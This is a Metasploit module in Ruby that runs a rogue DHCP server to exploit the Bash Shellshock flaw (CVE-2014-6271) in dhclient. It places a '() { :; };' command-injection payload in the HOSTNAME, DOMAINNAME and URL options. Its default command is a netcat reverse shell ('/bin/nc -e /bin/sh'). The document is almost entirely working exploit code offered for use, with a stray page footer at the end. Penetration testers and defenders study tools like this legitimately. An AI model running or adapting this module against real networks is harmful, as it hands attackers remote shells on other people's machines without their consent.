|
require 'msf/core'
require 'rex/proto/dhcp'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DHCPServer
def initialize
super(
'Name' => 'DHCP Client Bash Environment Variable Code Injection',
'Description' => %q{
This module exploits a code injection in specially crafted environment
variables in Bash, specifically targeting dhclient network configuration
scripts through the HOSTNAME, DOMAINNAME, and URL DHCP options.
},
'Author' =>
[
'scriptjunkie', 'apconole[at]yahoo.com',
'Stephane Chazelas',
'Ramon de C Valle'
],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Service' ]
],
'PassiveActions' =>
[
'Service'
],
'DefaultAction' => 'Service',
'References' => [
['CVE', '2014-6271'],
['CWE', '94'],
],
'DisclosureDate' => 'Sep 24 2014'
)
register_options(
[
OptString.new('SRVHOST', [ true, 'The IP of the DHCP server' ]),
OptString.new('NETMASK', [ true, 'The netmask of the local subnet' ]),
OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]),
OptString.new('DHCPIPEND', [ false, 'The last IP to give out' ]),
OptString.new('ROUTER', [ false, 'The router IP address' ]),
OptString.new('BROADCAST', [ false, 'The broadcast address to send to' ]),
OptString.new('DNSSERVER', [ false, 'The DNS server IP address' ]),
OptString.new('HOSTSTART', [ false, 'The optional host integer counter' ]),
OptString.new('FILENAME', [ false, 'The optional filename of a tftp boot server' ]),
OptString.new('CMD', [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444'])
], self.class)
end
def run
value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"
loop do
begin
start_service({
'HOSTNAME' => value,
'DOMAINNAME' => value,
'URL' => value
}.merge(datastore))
while dhcp.thread.alive?
select(nil, nil, nil, 2)
end
rescue Interrupt
break
ensure
stop_service
end
end
end
end
|
推荐
评论(0条)
